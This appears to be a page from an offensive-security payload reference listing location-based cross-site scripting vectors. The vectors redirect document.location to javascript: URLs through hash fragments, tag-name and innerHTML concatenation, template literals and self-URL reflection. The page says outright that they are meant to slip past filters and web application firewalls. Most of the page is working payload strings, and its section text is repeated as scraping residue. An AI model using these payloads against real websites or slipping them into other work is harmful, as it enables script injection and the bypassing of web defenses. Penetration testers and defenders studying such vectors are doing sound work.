📡Location Based Payloads

Location Based Payloads

The following XSS vectors use a more elaborated way to execute the payload making use of document properties to feed another document property, the location one.

That leads to complex vectors which can be very useful to bypass filters and WAFs. Because they use arbitrary tags (XHTML), any of the Agnostic Event Handlers seen before can be used. Here, “onmouseover” will be used as default.

Encode the plus sign (+) as %2B in URLs.

Location Basics

Simple Payloads

<svg/onload=location=‘javascript:alert(1)’>
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)

---------------------------------------------------------------

Location Basics

Vectors with simpler manipulation to achieve the redirection to javascript pseudo-protocol.

<j/onmouseover=location=innerHTML>javascript:alert(1)//
<iframe id=t:alert(1) name=javascript onload=location=name+id>

---------------------------------------------------------------

Location with URL Fragment

It’s required to use the vector with an unencoded # sign. If used in POST requests, URL fragments must be used in the action URL.

<javascript/onmouseover=location=tagName+innerHTML+location.hash>:/*hoverme!</javascript>#*/alert(1)
<javascript/onmouseover=location=tagName+innerHTML+location.hash>:'hoverme!</javascript>#'-alert(1)
<javascript:'-`/onmouseover=location=tagName+URL>hoverme!#`-alert(1)
<j/onmouseover=location=innerHTML+URL>javascript:'-`hoverme!</j>#`-alert(1)
<javas/onmouseover=location=tagName+innerHTML+URL>cript:'-`hoverme!</javas>#`-alert(1)
<javascript:/onmouseover=location=tagName+URL>hoverme!#%0Aalert(1)
<j/onmouseover=location=innerHTML+URL>javascript:</j>#%0Aalert(1)
<javas/onmouseover=location=tagName+innerHTML+URL>cript:</javas>#%0Aalert(1)

---------------------------------------------------------------

Location with Leading Alert

`-alert(1)<javascript:`/onmouseover=location=tagName+previousSibling.nodeValue>hovermejava
`-alert(1)<javas/onmouseover=location=tagName+innerHTML+previousSibling.nodeValue>cript:`hoverme!
<alert(1)<!--/onmouseover=location=innerHTML+outerHTML>javascript:1/*hoverme!*/</alert(1)<!-->
<j/1="*/""-alert(1)<!--/onmouseover=location=innerHTML+outerHTML>javascript:/*hoverme!
*/"<j/1=/alert(1)//onmouseover=location=innerHTML+previousSibling.nodeValue+outerHTML>javascript:/*hoverme!

---------------------------------------------------------------

Location with Self URL

It’s required to replace [P} with the vulnerable parameter where input is used. Encode “&” as %26 in URLs. The last payload is Firefox only.

<svg id=?[P]=<svg/onload=alert(1)+ onload=location=id>
<j/onmouseover=location=textContent>?[P]=&lt;svg/onload=alert(1)>hoverme!</j>
<j/onmouseover=location+=textContent>&[P]=&lt;svg/onload=alert(1)>hoverme!</j>
<j&[P]=<svg+onload=alert(1)/onmouseover=location+=outerHTML>hoverme!</j&[P]=<svg+onload=alert(1)>
&[P]=&lt;svg/onload=alert(1)><j/onmouseover=location+=document.body.textContent>hoverme!</j>

---------------------------------------------------------------

Location with Template Literal

${alert(1)}<javascript:`//onmouseover=location=tagName+URL>hoverme!
${alert(1)}<j/onmouseover=location=innerHTML+URL>javascript:`//hoverme!
${alert(1)}<javas/onmouseover=location=tagName+innerHTML+URL>cript:`//hoverme!
${alert(1)}`<javascript:`//onmouseover=location=tagName+previousSibling.nodeValue>hoverme!
${alert(1)}`<javas/onmouseover=location=tagName+innerHTML+previousSibling.nodeValue>cript:`hoverme!

---------------------------------------------------------------

Location-Based Payload - Javascript Keyword Evasion

Use to evade the “javascript:” keyword against filters and WAFs. The “all” index
(here “1” as example) must be adapted using the following snippet of code in
browser console: a=document.all;for(i=0;i<a.length;i++)
{if(a[i].innerText=="javascript:alert(1)"){console.log('allIndex='+i)}}


<k>javas<x>cript:ale<x>rt(1)</k><svg id=innerText onload=location=all[1][id]>

---------------------------------------------------------------

Location Based Payloads

When a filter detects and blocks the XSS attempt in the parentheses in a payload,

<svg/onload=location=location.hash.substr(1)>#j
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)
<svg/onload=location=‘javas’%2B‘cript:’%2B‘ale’%2B‘rt’%2Blocation.hash.substr(1)>#(1)
<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)

without parentheses:
<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source%2B/rt/.source%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()

PreviousEvent Based XSS NextPHP Function Bypass

Last updated 1 year ago

hashtagLocation Based Payloads

hashtagThe following XSS vectors use a more elaborated way to execute the payload making use of document properties to feed another document property, the location one.

hashtagThat leads to complex vectors which can be very useful to bypass filters and WAFs. Because they use arbitrary tags (XHTML), any of the Agnostic Event Handlers seen before can be used. Here, “onmouseover” will be used as default.

hashtagEncode the plus sign (+) as %2B in URLs.

hashtagLocation Basics

hashtagSimple Payloads

hashtag---------------------------------------------------------------

hashtagLocation Basics

hashtagVectors with simpler manipulation to achieve the redirection to javascript pseudo-protocol.

hashtag---------------------------------------------------------------

hashtagLocation with URL Fragment

hashtagIt’s required to use the vector with an unencoded # sign. If used in POST requests, URL fragments must be used in the action URL.

hashtag---------------------------------------------------------------

hashtagLocation with Leading Alert

hashtag---------------------------------------------------------------

hashtagLocation with Self URL

hashtagIt’s required to replace [P} with the vulnerable parameter where input is used. Encode “&” as %26 in URLs. The last payload is Firefox only.

hashtag---------------------------------------------------------------

hashtagLocation with Template Literal

hashtag---------------------------------------------------------------

hashtagLocation-Based Payload - Javascript Keyword Evasion

hashtag---------------------------------------------------------------

hashtagLocation Based Payloads

hashtagWhen a filter detects and blocks the XSS attempt in the parentheses in a payload,

Location Based Payloads

The following XSS vectors use a more elaborated way to execute the payload making use of document properties to feed another document property, the location one.

That leads to complex vectors which can be very useful to bypass filters and WAFs. Because they use arbitrary tags (XHTML), any of the Agnostic Event Handlers seen before can be used. Here, “onmouseover” will be used as default.

Encode the plus sign (+) as %2B in URLs.

Location Basics

Simple Payloads

---------------------------------------------------------------

Location Basics

Vectors with simpler manipulation to achieve the redirection to javascript pseudo-protocol.

---------------------------------------------------------------

Location with URL Fragment

It’s required to use the vector with an unencoded # sign. If used in POST requests, URL fragments must be used in the action URL.

---------------------------------------------------------------

Location with Leading Alert

---------------------------------------------------------------

Location with Self URL

It’s required to replace [P} with the vulnerable parameter where input is used. Encode “&” as %26 in URLs. The last payload is Firefox only.

---------------------------------------------------------------

Location with Template Literal

---------------------------------------------------------------

Location-Based Payload - Javascript Keyword Evasion

---------------------------------------------------------------

Location Based Payloads

When a filter detects and blocks the XSS attempt in the parentheses in a payload,